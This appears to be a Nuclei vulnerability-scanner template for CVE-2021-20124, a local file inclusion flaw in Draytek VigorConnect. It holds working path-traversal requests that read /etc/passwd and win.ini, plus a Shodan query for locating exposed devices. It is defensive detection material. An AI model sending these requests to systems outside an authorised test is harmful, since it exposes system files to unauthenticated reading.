56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2021-20124
|
|
|
|
info:
|
|
name: Draytek VigorConnect 6.0-B3 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2021-42
|
|
- https://www.draytek.com/products/vigorconnect/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20124
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-20124
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0152
|
|
epss-percentile: 0.85539
|
|
cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: draytek
|
|
product: vigorconnect
|
|
shodan-query: http.html:"VigorConnect"
|
|
tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "for 16-bit app support"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220786481e684737ed27b11b4f4f5b04df70aa92f9b22abd61e93d93fa04b4e5bd70221008828d56e63531ea01efba534416f881b79a032d7b8e7c8e4e96e3b631982ea09:922c64590222798bb761d5b6d8e72950
|